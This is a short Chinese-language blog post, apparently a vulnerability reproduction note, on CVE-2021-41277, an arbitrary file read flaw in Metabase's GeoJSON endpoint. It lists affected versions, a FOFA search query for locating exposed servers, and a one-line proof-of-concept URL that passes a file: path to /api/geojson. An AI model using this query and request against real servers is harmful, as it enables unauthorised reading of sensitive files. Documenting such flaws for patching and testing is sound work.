加载中...

Metabasegeojson任意文件读取漏洞CVE-2021-41277

发表于2022-02-19|更新于2022-02-19|漏洞复现Metabasegeojson

|字数总计:108|阅读时长:1分钟|阅读量:

Metabasegeojson任意文件读取漏洞CVE-2021-41277

一、漏洞描述

在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息

二、漏洞影响

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

1、fofa.so搜索

1	"Metabase geojson"

POC:

1	https://IP/api/geojson?url=file:xxxxx

文章作者: TONG

文章链接: https://tong0s.github.io/CVE-2021-41277-Metabasegeojson%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 WUTONG！

相关推荐

CobaltStrike使用已知私钥或进程解密

cs域前置隐藏

云函数和cs并派生到msf

本地搜索

由 hexo-generator-search 提供支持